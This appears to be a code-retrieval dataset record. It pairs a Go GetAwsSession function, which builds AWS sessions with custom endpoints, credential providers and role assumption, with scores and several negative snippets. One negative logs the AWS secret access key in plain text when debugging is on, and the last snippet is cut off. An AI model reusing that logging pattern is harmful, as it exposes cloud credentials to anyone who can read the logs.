2990, 2991, 2992, 2993, 2994, 2995, 2996, 2997, 2998, 2999, 3000, 3001, 3002, 3003, 3004, 3005, 3006, 3007, 3008, 3009, 3010, 3011, 3012, 3013, 3014, 3015, 3016, 3017, 3018, 3019, 3020, 3021, 3022, 3023, 3024, 3025, 3026, 3027, 3028, 3029, 3030, 3031, 3032, 3033, 3034, 3035, 3036, 3037, 3038, 3039, 3040, 3041, 3042, 3043, 3044, 3045, 3046, 3047, 3048, 3049, 3050, 3051, 3052, 3053, 3054, 3055, 3056, 3057, 3058, 3059, 3060, 3061, 3062, 3063, 3064, 3065, 3066, 3067, 3068, 3069, 3070, 3071, 3072, 3073, 3074, 3075, 3076, 3077, 3078, 3079, 3080, 3081, 3082, 3083, 3084, 3085, 3086, 3087, 3088, 3089, 3090, 3091, 3092, 3093, 3094, 3095, 3096, 3097, 3098, 3099, 3100, 3101, 3102, 3103, 3104, 3105, 3106, 3107, 3108, 3109, 3110, 3111, 3112, 3113, 3114, 3115, 3116, 3117, 3118, 3119, 3120, 3121, 3122, 3123, 3124, 3125, 3126, 3127, 3128, 3129, 3130, 3131, 3132, 3133, 3134, 3135, 3136, 3137, 3138, 3139, 3140, 3141, 3142, 3143, 3144, 3145, 3146, 3147, 3148, 3149, 3150, 3151, 3152, 3153, 3154, 3155, 3156, 3157, 3158, 3159, 3160, 3161, 3162, 3163, 3164, 3165, 3166, 3167, 3168, 3169, 3170, 3171, 3172, 3173, 3174, 3175, 3176, 3177, 3178, 3179, 3180, 3181, 3182, 3183, 3184, 3185, 3186, 3187, 3188, 3189, 3190, 3191, 3192, 3193, 3194, 3195, 3196, 3197, 3198, 3199, 3200, 3201, 3202, 3203, 3204, 3205, 3206, 3207, 3208, 3209, 3210, 3211, 3212, 3213, 3214, 3215, 3216, 3217, 3218, 3219, 3220, 3221, 3222, 3223, 3224, 3225, 3226, 3227, 3228, 3229, 3230, 3231, 3232, 3233, 3234, 3235, 3236, 3237, 3238, 3239, 3240, 3241, 3242, 3243, 3244, 3245, 3246, 3247, 3248, 3249, 3250, 3251, 3252, 3253, 3254, 3255, 3256, 3257, 3258, 3259, 3260, 3261, 3262, 3263, 3264, 3265, 3266, 3267, 3268, 3269, 3270, 3271, 3272, 3273, 3274, 3275, 3276, 3277, 3278, 3279, 3280, 3281, 3282, 3283, 3284, 3285, 3286, 3287, 3288, 3289, 3290, 3291, 3292, 3293, 3294, 3295, 3296, 3297, 3298, 3299, 3300, 3301, 3302, 3303, 3304, 3305, 3306, 3307, 3308, 3309, 3310, 3311, 3312, 3313, 3314, 3315, 3316, 3317, 3318, 3319, 3320, 3321, 3322, 3323, 3324, 3325, 3326, 3327, 3328, 3329, 3330, 3331, 3332, 3333, 3334, 3335, 3336, 3337, 3338, 3339, 3340, 3341, 3342, 3343, 3344, 3345, 3346, 3347, 3348, 3349, 3350, 3351, 3352, 3353, 3354, 3355, 3356, 3357, 3358, 3359, 3360, 3361, 3362, 3363, 3364, 3365, 3366, 3367, 3368, 3369, 3370, 3371, 3372, 3373, 3374, 3375, 3376, 3377, 3378, 3379, 3380, 3381, 3382, 3383, 3384, 3385, 3386, 3387, 3388, 3389, 3390, 3391, 3392, 3393, 3394, 3395, 3396, 3397, 3398, 3399, 3400, 3401, 3402, 3403, 3404, 3405, 3406, 3407, 3408, 3409, 3410, 3411, 3412, 3413, 3414, 3415, 3416, 3417, 3418, 3419, 3420, 3421, 3422, 3423, 3424, 3425, 3426, 3427, 3428, 3429, 3430, 3431, 3432, 3433, 3434, 3435, 3436, 3437, 3438, 3439, 3440, 3441, 3442, 3443, 3444, 3445, 3446, 3447, 3448, 3449, 3450, 3451, 3452, 3453, 3454, 3455, 3456, 3457, 3458, 3459, 3460, 3461, 3462, 3463, 3464, 3465, 3466, 3467, 3468, 3469, 3470, 3471, 3472, 3473, 3474, 3475, 3476, 3477, 3478, 3479, 3480, 3481, 3482, 3483, 3484, 3485, 3486, 3487, 3488, 3489, 3490, 3491, 3492, 3493, 3494, 3495, 3496, 3497, 3498, 3499, 3500, 3501, 3502, 3503, 3504, 3505, 3506, 3507, 3508, 3509, 3510, 3511, 3512, 3513, 3514, 3515, 3516, 3517, 3518, 3519, 3520, 3521, 3522, 3523, 3524, 3525, 3526, 3527, 3528, 3529, 3530, 3531, 3532, 3533, 3534, 3535, 3536, 3537, 3538, 3539, 3540, 3541, 3542, 3543, 3544, 3545, 3546, 3547, 3548, 3549, 3550, 3551, 3552, 3553, 3554, 3555, 3556, 3557, 3558, 3559, 3560, 3561, 3562, 3563, 3564, 3565, 3566, 3567, 3568, 3569, 3570, 3571, 3572, 3573, 3574, 3575, 3576, 3577, 3578, 3579, 3580, 3581, 3582, 3583, 3584, 3585, 3586, 3587, 3588, 3589, 3590, 3591, 3592, 3593, 3594, 3595, 3596, 3597, 3598, 3599, 3600, 3601, 3602, 3603, 3604, 3605, 3606, 3607, 3608, 3609, 3610, 3611, 3612, 3613, 3614, 3615, 3616, 3617, 3618, 3619, 3620, 3621, 3622, 3623, 3624, 3625, 3626, 3627, 3628, 3629, 3630, 3631, 3632, 3633, 3634, 3635, 3636, 3637, 3638, 3639, 3640, 3641, 3642, 3643, 3644, 3645, 3646, 3647, 3648, 3649, 3650, 3651, 3652, 3653, 3654, 3655, 3656, 3657, 3658, 3659, 3660, 3661, 3662, 3663, 3664, 3665, 3666, 3667, 3668, 3669, 3670, 3671, 3672, 3673, 3674, 3675, 3676, 3677, 3678, 3679, 3680, 3681, 3682, 3683, 3684, 3685, 3686, 3687, 3688, 3689, 3690, 3691, 3692, 3693, 3694, 3695, 3696, 3697, 3698, 3699, 3700, 3701, 3702, 3703, 3704, 3705, 3706, 3707, 3708, 3709, 3710, 3711, 3712, 3713, 3714, 3715, 3716, 3717, 3718, 3719, 3720, 3721, 3722, 3723, 3724, 3725, 3726, 3727, 3728, 3729, 3730, 3731, 3732, 3733, 3734, 3735, 3736, 3737, 3738, 3739, 3740, 3741, 3742, 3743, 3744, 3745, 3746, 3747, 3748, 3749, 3750, 3751, 3752, 3753, 3754, 3755, 3756, 3757, 3758, 3759, 3760, 3761, 3762, 3763, 3764, 3765, 3766, 3767, 3768, 3769, 3770, 3771, 3772, 3773, 3774, 3775, 3776, 3777, 3778, 3779, 3780, 3781, 3782, 3783, 3784, 3785, 3786, 3787, 3788, 3789, 3790, 3791, 3792, 3793, 3794, 3795, 3796, 3797, 3798, 3799, 3800, 3801, 3802, 3803, 3804, 3805, 3806, 3807, 3808, 3809, 3810, 3811, 3812, 3813, 3814, 3815, 3816, 3817, 3818, 3819, 3820, 3821, 3822, 3823, 3824, 3825, 3826, 3827, 3828, 3829, 3830, 3831, 3832, 3833, 3834, 3835, 3836, 3837, 3838, 3839, 3840, 3841, 3842, 3843, 3844, 3845, 3846, 3847, 3848, 3849, 3850, 3851, 3852, 3853, 3854, 3855, 3856, 3857, 3858, 3859, 3860, 3861, 3862, 3863, 3864, 3865, 3866, 3867, 3868, 3869, 3870, 3871, 3872, 3873, 3874, 3875, 3876, 3877, 3878, 3879, 3880, 3881, 3882, 3883, 3884, 3885, 3886, 3887, 3888, 3889, 3890, 3891, 3892, 3893, 3894, 3895, 3896, 3897, 3898, 3899, 3900, 3901, 3902, 3903, 3904, 3905, 3906, 3907, 3908, 3909, 3910, 3911, 3912, 3913, 3914, 3915, 3916, 3917, 3918, 3919, 3920, 3921, 3922, 3923, 3924, 3925, 3926, 3927, 3928, 3929, 3930, 3931, 3932, 3933, 3934, 3935, 3936, 3937, 3938, 3939, 3940, 3941, 3942, 3943, 3944, 3945, 3946, 3947, 3948, 3949, 3950, 3951, 3952, 3953, 3954, 3955, 3956, 3957, 3958, 3959, 3960, 3961, 3962, 3963, 3964, 3965, 3966, 3967, 3968, 3969, 3970, 3971, 3972, 3973, 3974, 3975, 3976, 3977, 3978, 3979, 3980, 3981, 3982, 3983, 3984, 3985, 3986, 3987, 3988, 3989, 3990, 3991, 3992, 3993, 3994, 3995, 3996, 3997, 3998, 3999, 4000, 4001, 4002, 4003, 4004, 4005, 4006, 4007, 4008, 4009, 4010, 4011, 4012, 4013, 4014, 4015, 4016, 4017, 4018, 4019, 4020, 4021, 4022, 4023, 4024, 4025, 4026, 4027, 4028, 4029, 4030, 4031, 4032, 4033, 4034, 4035, 4036, 4037, 4038, 4039, 4040, 4041, 4042, 4043, 4044, 4045, 4046, 4047, 4048, 4049, 4050, 4051, 4052, 4053, 4054, 4055, 4056, 4057, 4058, 4059, 4060, 4061, 4062, 4063, 4064, 4065, 4066, 4067, 4068, 4069, 4070, 4071, 4072, 4073, 4074, 4075, 4076, 4077, 4078, 4079, 4080, 4081, 4082, 4083, 4084, 4085, 4086, 4087, 4088, 4089, 4090, 4091, 4092, 4093, 4094, 4095, 4096, 4097, 4098, 4099, 4100, 4101, 4102, 4103, 4104, 4105, 4106, 4107, 4108, 4109, 4110, 4111, 4112, 4113, 4114, 4115, 4116, 4117, 4118, 4119, 4120, 4121, 4122, 4123, 4124, 4125, 4126, 4127, 4128, 4129, 4130, 4131, 4132, 4133, 4134, 4135, 4136, 4137, 4138, 4139, 4140, 4141, 4142, 4143, 4144, 4145, 4146, 4147, 4148, 4149, 4150, 4151, 4152, 4153, 4154, 4155, 4156, 4157, 4158, 4159, 4160, 4161, 4162, 4163, 4164, 4165, 4166, 4167, 4168, 4169, 4170, 4171, 4172, 4173, 4174, 4175, 4176, 4177, 4178, 4179, 4180, 4181, 4182, 4183, 4184, 4185, 4186, 4187, 4188, 4189, 4190, 4191, 4192, 4193, 4194, 4195, 4196, 4197, 4198, 4199, 4200, 4201, 4202, 4203, 4204, 4205, 4206, 4207, 4208, 4209, 4210, 4211, 4212, 4213, 4214, 4215, 4216, 4217, 4218, 4219, 4220, 4221, 4222, 4223, 4224, 4225, 4226, 4227, 4228, 4229, 4230, 4231, 4232, 4233, 4234, 4235, 4236, 4237, 4238, 4239, 4240, 4241, 4242, 4243, 4244, 4245, 4246, 4247, 4248, 4249, 4250, 4251, 4252, 4253, 4254, 4255, 4256, 4257, 4258, 4259, 4260, 4261, 4262, 4263, 4264, 4265, 4266, 4267, 4268, 4269, 4270, 4271, 4272, 4273, 4274, 4275, 4276, 4277, 4278, 4279, 4280, 4281, 4282, 4283, 4284, 4285, 4286, 4287, 4288, 4289, 4290, 4291, 4292, 4293, 4294, 4295, 4296, 4297, 4298, 4299, 4300, 4301, 4302, 4303, 4304, 4305, 4306, 4307, 4308, 4309, 4310, 4311, 4312, 4313, 4314, 4315, 4316, 4317, 4318, 4319, 4320, 4321, 4322, 4323, 4324, 4325, 4326, 4327, 4328, 4329, 4330, 4331, 4332, 4333, 4334, 4335, 4336, 4337, 4338, 4339, 4340, 4341, 4342, 4343, 4344, 4345, 4346, 4347, 4348, 4349, 4350, 4351, 4352, 4353, 4354, 4355, 4356, 4357, 4358, 4359, 4360, 4361, 4362, 4363, 4364, 4365, 4366, 4367, 4368, 4369, 4370, 4371, 4372, 4373, 4374, 4375, 4376, 4377, 4378, 4379, 4380, 4381, 4382, 4383, 4384, 4385, 4386, 4387, 4388, 4389, 4390, 4391, 4392, 4393, 4394, 4395, 4396, 4397, 4398, 4399, 4400, 4401, 4402, 4403, 4404, 4405, 4406, 4407, 4408, 4409, 4410, 4411, 4412, 4413, 4414, 4415, 4416, 4417, 4418, 4419, 4420, 4421, 4422, 4423, 4424, 4425, 4426, 4427, 4428, 4429, 4430, 4431, 4432, 4433, 4434, 4435, 4436, 4437, 4438, 4439, 4440, 4441, 4442, 4443, 4444, 4445, 4446, 4447, 4448, 4449, 4450, 4451, 4452, 4453, 4454, 4455, 4456, 4457, 4458, 4459, 4460, 4461, 4462, 4463, 4464, 4465, 4466, 4467, 4468, 4469, 4470, 4471, 4472, 4473, 4474, 4475, 4476, 4477, 4478, 4479, 4480, 4481, 4482, 4483, 4484, 4485, 4486, 4487, 4488, 4489, 4490, 4491, 4492, 4493, 4494, 4495, 4496, 4497, 4498, 4499, 4500, 4501, 4502, 4503, 4504, 4505, 4506, 4507, 4508, 4509, 4510, 4511, 4512, 4513, 4514, 4515, 4516, 4517, 4518, 4519, 4520, 4521, 4522, 4523, 4524, 4525, 4526, 4527, 4528, 4529, 4530, 4531, 4532, 4533, 4534, 4535, 4536, 4537, 4538, 4539, 4540, 4541, 4542, 4543, 4544, 4545, 4546, 4547, 4548, 4549, 4550, 4551, 4552, 4553, 4554, 4555, 4556, 4557, 4558, 4559, 4560, 4561, 4562, 4563, 4564, 4565, 4566, 4567, 4568, 4569, 4570, 4571, 4572, 4573, 4574, 4575, 4576, 4577, 4578, 4579, 4580, 4581, 4582, 4583, 4584, 4585, 4586, 4587, 4588, 4589, 4590, 4591, 4592, 4593, 4594, 4595, 4596, 4597, 4598, 4599, 4600, 4601, 4602, 4603, 4604, 4605, 4606, 4607, 4608, 4609, 4610, 4611, 4612, 4613, 4614, 4615, 4616, 4617, 4618, 4619, 4620, 4621, 4622, 4623, 4624, 4625, 4626, 4627, 4628, 4629, 4630, 4631, 4632, 4633, 4634, 4635, 4636, 4637, 4638, 4639, 4640, 4641, 4642, 4643, 4644, 4645, 4646, 4647, 4648, 4649, 4650, 4651, 4652, 4653, 4654, 4655, 4656, 4657, 4658, 4659, 4660, 4661, 4662, 4663, 4664, 4665, 4666, 4667, 4668, 4669, 4670, 4671, 4672, 4673, 4674, 4675, 4676, 4677, 4678, 4679, 4680, 4681, 4682, 4683, 4684, 4685, 4686, 4687, 4688, 4689, 4690, 4691, 4692, 4693, 4694, 4695, 4696, 4697, 4698, 4699, 4700, 4701, 4702, 4703, 4704, 4705, 4706, 4707, 4708, 4709, 4710, 4711, 4712, 4713, 4714, 4715, 4716, 4717, 4718, 4719, 4720, 4721, 4722, 4723, 4724, 4725, 4726, 4727, 4728, 4729, 4730, 4731, 4732, 4733, 4734, 4735, 4736, 4737, 4738, 4739, 4740, 4741, 4742, 4743, 4744, 4745, 4746, 4747, 4748, 4749, 4750, 4751, 4752, 4753, 4754, 4755, 4756, 4757, 4758, 4759, 4760, 4761, 4762, 4763, 4764, 4765, 4766, 4767, 4768, 4769, 4770, 4771, 4772, 4773, 4774, 4775, 4776, 4777, 4778, 4779, 4780, 4781, 4782, 4783, 4784, 4785, 4786, 4787, 4788, 4789, 4790, 4791, 4792, 4793, 4794, 4795, 4796, 4797, 4798, 4799, 4800, 4801, 4802, 4803, 4804, 4805, 4806, 4807, 4808, 4809, 4810, 4811, 4812, 4813, 4814, 4815, 4816, 4817, 4818, 4819, 4820, 4821, 4822, 4823, 4824, 4825, 4826, 4827, 4828, 4829, 4830, 4831, 4832, 4833, 4834, 4835, 4836, 4837, 4838, 4839, 4840, 4841, 4842, 4843, 4844, 4845, 4846, 4847, 4848, 4849, 4850, 4851, 4852, 4853, 4854, 4855, 4856, 4857, 4858, 4859, 4860, 4861, 4862, 4863, 4864, 4865, 4866, 4867, 4868, 4869, 4870, 4871, 4872, 4873, 4874, 4875, 4876, 4877, 4878, 4879, 4880, 4881, 4882, 4883, 4884, 4885, 4886, 4887, 4888, 4889, 4890, 4891, 4892, 4893, 4894, 4895, 4896, 4897, 4898, 4899, 4900, 4901, 4902, 4903, 4904, 4905, 4906, 4907, 4908, 4909, 4910, 4911, 4912, 4913, 4914, 4915, 4916, 4917, 4918, 4919, 4920, 4921, 4922, 4923, 4924, 4925, 4926, 4927, 4928, 4929, 4930, 4931, 4932, 4933, 4934, 4935, 4936, 4937, 4938, 4939, 4940, 4941, 4942, 4943, 4944, 4945, 4946, 4947, 4948, 4949, 4950, 4951, 4952, 4953, 4954, 4955, 4956, 4957, 4958, 4959, 4960, 4961, 4962, 4963, 4964, 4965, 4966, 4967, 4968, 4969, 4970, 4971, 4972, 4973, 4974, 4975, 4976, 4977, 4978, 4979, 4980, 4981, 4982, 4983, 4984, 4985, 4986, 4987, 4988, 4989, 4990, 4991, 4992, 4993, 4994, 4995, 4996, 4997, 4998, 4999}\n\n\tQuickSortInt(&data, 0, dataSize-1)\n}" ]
[ "0.7229065", "0.7190257", "0.707405", "0.706499", "0.7031688", "0.6961537", "0.6913219", "0.6912623", "0.6788063", "0.6781634", "0.67755073", "0.6756104", "0.67342824", "0.67150515", "0.6709114", "0.6702981", "0.6681376", "0.6680446", "0.66566795", "0.66553825", "0.66483855", "0.6629333", "0.6616173", "0.6612472", "0.659947", "0.65972006", "0.65502906", "0.6544507", "0.6537861", "0.65287364", "0.6515288", "0.648372", "0.64657414", "0.64474386", "0.6423574", "0.64226604", "0.6401231", "0.6381742", "0.63728845", "0.63692683", "0.63542145", "0.63500834", "0.63468415", "0.6342127", "0.6341714", "0.6335281", "0.63334286", "0.63145334", "0.6302365", "0.6295531", "0.6294749", "0.6259418", "0.62585616", "0.62493485", "0.6234789", "0.6231355", "0.62114257", "0.6200711", "0.61731285", "0.6155258", "0.61550915", "0.6149838", "0.612993", "0.6127398", "0.61241883", "0.6119877", "0.61160034", "0.60489804", "0.6040584", "0.6038803", "0.60347736", "0.6021277", "0.5992807", "0.5976704", "0.59729934", "0.5955172", "0.5922911", "0.592209", "0.5920098", "0.59161645", "0.59049004", "0.5885337", "0.5868498", "0.5860335", "0.5819087", "0.5809383", "0.5769749", "0.5762414", "0.5747397", "0.5744283", "0.57297343", "0.5724635", "0.5724284", "0.5724238", "0.5721959", "0.5720971", "0.56901413", "0.5685108", "0.56524795", "0.5646732" ]
0.5829982
84
GetAwsSession Returns an AWS session for the specified server cfguration
func GetAwsSession(cfg config.ServerConfig) (*session.Session, error) { var providers []credentials.Provider customResolver := func(service, region string, optFns ...func(*endpoints.Options)) (endpoints.ResolvedEndpoint, error) { if service == endpoints.RdsServiceID && cfg.AwsEndpointRdsURL != "" { return endpoints.ResolvedEndpoint{ URL: cfg.AwsEndpointRdsURL, SigningRegion: cfg.AwsEndpointSigningRegion, }, nil } if service == endpoints.Ec2ServiceID && cfg.AwsEndpointEc2URL != "" { return endpoints.ResolvedEndpoint{ URL: cfg.AwsEndpointEc2URL, SigningRegion: cfg.AwsEndpointSigningRegion, }, nil } if service == endpoints.MonitoringServiceID && cfg.AwsEndpointCloudwatchURL != "" { return endpoints.ResolvedEndpoint{ URL: cfg.AwsEndpointCloudwatchURL, SigningRegion: cfg.AwsEndpointSigningRegion, }, nil } if service == endpoints.LogsServiceID && cfg.AwsEndpointCloudwatchLogsURL != "" { return endpoints.ResolvedEndpoint{ URL: cfg.AwsEndpointCloudwatchLogsURL, SigningRegion: cfg.AwsEndpointSigningRegion, }, nil } return endpoints.DefaultResolver().EndpointFor(service, region, optFns...) } if cfg.AwsAccessKeyID != "" { providers = append(providers, &credentials.StaticProvider{ Value: credentials.Value{ AccessKeyID: cfg.AwsAccessKeyID, SecretAccessKey: cfg.AwsSecretAccessKey, SessionToken: "", }, }) } // add default providers providers = append(providers, &credentials.EnvProvider{}) providers = append(providers, &credentials.SharedCredentialsProvider{Filename: "", Profile: ""}) // add the metadata service def := defaults.Get() def.Config.HTTPClient = config.CreateEC2IMDSHTTPClient(cfg) def.Config.MaxRetries = aws.Int(2) providers = append(providers, defaults.RemoteCredProvider(*def.Config, def.Handlers)) creds := credentials.NewChainCredentials(providers) if cfg.AwsAssumeRole != "" || (cfg.AwsWebIdentityTokenFile != "" && cfg.AwsRoleArn != "") { sess, err := session.NewSession(&aws.Config{ Credentials: creds, CredentialsChainVerboseErrors: aws.Bool(true), Region: aws.String(cfg.AwsRegion), HTTPClient: cfg.HTTPClient, EndpointResolver: endpoints.ResolverFunc(customResolver), }) if err != nil { return nil, err } if cfg.AwsAssumeRole != "" { creds = stscreds.NewCredentials(sess, cfg.AwsAssumeRole) } else if cfg.AwsWebIdentityTokenFile != "" && cfg.AwsRoleArn != "" { creds = stscreds.NewWebIdentityCredentials(sess, cfg.AwsRoleArn, "", cfg.AwsWebIdentityTokenFile) } } return session.NewSession(&aws.Config{ Credentials: creds, CredentialsChainVerboseErrors: aws.Bool(true), Region: aws.String(cfg.AwsRegion), HTTPClient: cfg.HTTPClient, EndpointResolver: endpoints.ResolverFunc(customResolver), }) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func GetAwsSession(region string, awsAccessKeyID string, awsSecretAccessKey string) (*session.Session, error) {\n\tif awsAccessKeyID == \"\" || awsSecretAccessKey == \"\" {\n\t\tconfig := aws.Config{\n\t\t\tRegion: aws.String(region),\n\t\t\tMaxRetries: aws.Int(awsSdkMaxRetries),\n\t\t}\n\n\t\tsess, err := session.NewSessionWithOptions(session.Options{\n\t\t\tConfig: config,\n\t\t\tSharedConfigState: session.SharedConfigEnable,\n\t\t})\n\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn sess, nil\n\t}\n\n\tsess, err := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(region),\n\t\tCredentials: credentials.NewStaticCredentials(awsAccessKeyID, awsSecretAccessKey, \"\"),\n\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn sess, nil\n}", "func getSession(r string) *session.Session {\n\treturn session.New(&aws.Config{\n\t\tRegion: aws.String(r),\n\t})\n}", "func GetAwsSessionFromEnv() (*session.Session, error) {\n\tsess, err := session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn sess, nil\n}", "func (u *Utils) GetAWSSession() (*session.Session, error) {\n\tawsRegion := os.Getenv(\"AWS_REGION\")\n\tawsAccessKeyID := os.Getenv(\"AWS_ACCESS_KEY_ID\")\n\tawsSecretAccessKey := os.Getenv(\"AWS_SECRET_ACCESS_KEY\")\n\tawsProfile := os.Getenv(\"AWS_PROFILE\")\n\tawsToken := \"\"\n\tt := strings.ToUpper(os.Getenv(\"AWS_SESSION_DEBUG\"))\n\tdebug := false\n\tif t == \"TRUE\" {\n\t\tdebug = true\n\t}\n\n\tif debug {\n\t\tlog.Printf(\"Initiating AWS Seesion with AWS_PROFILE = %s, AWS_REGION = %s, AWS_ACCESS_KEY_ID = %s, AWS_SECRET_ACCESS_KEY = %s\", awsProfile, awsRegion, awsAccessKeyID, awsSecretAccessKey)\n\t} else {\n\t\tlog.Printf(\"Initiating AWS Seesion with AWS_PROFILE = %s, AWS_REGION = %s\", awsProfile, awsRegion)\n\t}\n\n\tsess, err := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(awsRegion),\n\t\tCredentials: credentials.NewStaticCredentials(awsAccessKeyID, awsSecretAccessKey, awsToken),\n\t})\n\n\treturn sess, err\n}", "func newAwsSession(p Params) (*session.Session, error) {\n\n\tconfig := aws.NewConfig()\n\tif p.region != \"\" {\n\t\tconfig.Region = aws.String(p.region)\n\t}\n\n\toptions := session.Options{\n\t\tConfig: *config,\n\t\tAssumeRoleTokenProvider: stscreds.StdinTokenProvider,\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t}\n\tif p.profile != \"\" {\n\t\toptions.Profile = p.profile\n\t}\n\tsess := session.Must(session.NewSessionWithOptions(options))\n\n\treturn sess, nil\n}", "func GetSession() (*session.Session, error) {\n\tif awsSession != nil {\n\t\treturn awsSession, nil\n\t}\n\n\tcreds := credentials.NewStaticCredentials(config.AWSSecretID, config.AWSSecretKey, \"\")\n\tsess, err := session.NewSession(&aws.Config{\n\t\tCredentials: creds,\n\t\tRegion: aws.String(\"us-east-1\"),\n\t})\n\n\tif err != nil {\n\t\tlogrus.Errorf(\"Unable to create aws session: %s\", err.Error())\n\t\treturn nil, fmt.Errorf(\"Unable to create aws session: %s\", err.Error())\n\t}\n\n\tawsSession = sess\n\treturn sess, nil\n}", "func awsSession() (*session.Session, error) {\n\tcreds := credentials.NewEnvCredentials()\n\tif _, err := creds.Get(); err == nil {\n\t\treturn awsSessionChecker(session.NewSessionWithOptions(session.Options{\n\t\t\tConfig: aws.Config{Credentials: creds},\n\t\t\tSharedConfigState: session.SharedConfigDisable,\n\t\t}))\n\t}\n\n\tsess, err := session.NewSessionWithOptions(session.Options{\n\t\tAssumeRoleTokenProvider: stscreds.StdinTokenProvider,\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t})\n\tif _, err := awsSessionChecker(sess, err); err == nil {\n\t\treturn sess, nil\n\t}\n\n\tcreds = ec2rolecreds.NewCredentials(sess)\n\tif _, err := creds.Get(); err == nil {\n\t\treturn awsSessionChecker(session.NewSessionWithOptions(session.Options{\n\t\t\tConfig: aws.Config{Credentials: creds},\n\t\t\tSharedConfigState: session.SharedConfigDisable,\n\t\t}))\n\t}\n\n\treturn awsSessionChecker(session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t}))\n}", "func (sc *SessionCache) GetSession(region string, s AWSDatasourceSettings) (*session.Session, error) {\n\tif region == \"\" || region == defaultRegion {\n\t\tregion = s.Region\n\t}\n\n\tauthTypeAllowed := false\n\tfor _, provider := range sc.authSettings.AllowedAuthProviders {\n\t\tif provider == s.AuthType.String() {\n\t\t\tauthTypeAllowed = true\n\t\t\tbreak\n\t\t}\n\t}\n\tif !authTypeAllowed {\n\t\treturn nil, fmt.Errorf(\"attempting to use an auth type that is not allowed: %q\", s.AuthType.String())\n\t}\n\n\tif s.AssumeRoleARN != \"\" && !sc.authSettings.AssumeRoleEnabled {\n\t\treturn nil, fmt.Errorf(\"attempting to use assume role (ARN) which is disabled in grafana.ini\")\n\t}\n\n\tbldr := strings.Builder{}\n\tfor i, s := range []string{\n\t\ts.AuthType.String(), s.AccessKey, s.Profile, s.AssumeRoleARN, region, s.Endpoint,\n\t} {\n\t\tif i != 0 {\n\t\t\tbldr.WriteString(\":\")\n\t\t}\n\t\tbldr.WriteString(strings.ReplaceAll(s, \":\", `\\:`))\n\t}\n\tcacheKey := bldr.String()\n\n\tsc.sessCacheLock.RLock()\n\tif env, ok := sc.sessCache[cacheKey]; ok {\n\t\tif env.expiration.After(time.Now().UTC()) {\n\t\t\tsc.sessCacheLock.RUnlock()\n\t\t\treturn env.session, nil\n\t\t}\n\t}\n\tsc.sessCacheLock.RUnlock()\n\n\tcfgs := []*aws.Config{\n\t\t{\n\t\t\tCredentialsChainVerboseErrors: aws.Bool(true),\n\t\t},\n\t}\n\n\tvar regionCfg *aws.Config\n\tif region == defaultRegion {\n\t\tplog.Warn(\"Region is set to \\\"default\\\", which is unsupported\")\n\t\tregion = \"\"\n\t}\n\tif region != \"\" {\n\t\tregionCfg = &aws.Config{Region: aws.String(region)}\n\t\tcfgs = append(cfgs, regionCfg)\n\t}\n\n\tif s.Endpoint != \"\" {\n\t\tcfgs = append(cfgs, &aws.Config{Endpoint: aws.String(s.Endpoint)})\n\t}\n\n\tif s.HTTPClient != nil {\n\t\tcfgs = append(cfgs, &aws.Config{HTTPClient: s.HTTPClient})\n\t}\n\n\tswitch s.AuthType {\n\tcase AuthTypeSharedCreds:\n\t\tplog.Debug(\"Authenticating towards AWS with shared credentials\", \"profile\", s.Profile,\n\t\t\t\"region\", region)\n\t\tcfgs = append(cfgs, &aws.Config{\n\t\t\tCredentials: credentials.NewSharedCredentials(\"\", s.Profile),\n\t\t})\n\tcase AuthTypeKeys:\n\t\tplog.Debug(\"Authenticating towards AWS with an access key pair\", \"region\", region)\n\t\tcfgs = append(cfgs, &aws.Config{\n\t\t\tCredentials: credentials.NewStaticCredentials(s.AccessKey, s.SecretKey, \"\"),\n\t\t})\n\tcase AuthTypeDefault:\n\t\tplog.Debug(\"Authenticating towards AWS with default SDK method\", \"region\", region)\n\tcase AuthTypeEC2IAMRole:\n\t\tplog.Debug(\"Authenticating towards AWS with IAM Role\", \"region\", region)\n\t\tsess, err := newSession(cfgs...)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcfgs = append(cfgs, &aws.Config{Credentials: newEC2RoleCredentials(sess)})\n\tdefault:\n\t\tpanic(fmt.Sprintf(\"Unrecognized authType: %d\", s.AuthType))\n\t}\n\tsess, err := newSession(cfgs...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tduration := stscreds.DefaultDuration\n\texpiration := time.Now().UTC().Add(duration)\n\tif s.AssumeRoleARN != \"\" && sc.authSettings.AssumeRoleEnabled {\n\t\t// We should assume a role in AWS\n\t\tplog.Debug(\"Trying to assume role in AWS\", \"arn\", s.AssumeRoleARN)\n\n\t\tcfgs := []*aws.Config{\n\t\t\t{\n\t\t\t\tCredentialsChainVerboseErrors: aws.Bool(true),\n\t\t\t},\n\t\t\t{\n\t\t\t\tCredentials: newSTSCredentials(sess, s.AssumeRoleARN, func(p *stscreds.AssumeRoleProvider) {\n\t\t\t\t\t// Not sure if this is necessary, overlaps with p.Duration and is undocumented\n\t\t\t\t\tp.Expiry.SetExpiration(expiration, 0)\n\t\t\t\t\tp.Duration = duration\n\t\t\t\t\tif s.ExternalID != \"\" {\n\t\t\t\t\t\tp.ExternalID = aws.String(s.ExternalID)\n\t\t\t\t\t}\n\t\t\t\t}),\n\t\t\t},\n\t\t}\n\t\tif regionCfg != nil {\n\t\t\tcfgs = append(cfgs, regionCfg)\n\t\t}\n\t\tsess, err = newSession(cfgs...)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tplog.Debug(\"Successfully created AWS session\")\n\n\tsc.sessCacheLock.Lock()\n\tsc.sessCache[cacheKey] = envelope{\n\t\tsession: sess,\n\t\texpiration: expiration,\n\t}\n\tsc.sessCacheLock.Unlock()\n\n\treturn sess, nil\n}", "func AwsSession() *session.Session {\n\treturn awsSession.Copy()\n}", "func GetSession() (*session.Session, error) {\n\tos.Getenv(\"\")\n\tsess, err := session.NewSession()\n\n\tif err != nil {\n\t\tlog.LogError(\"util:aws:AwsSession:GetSession\", 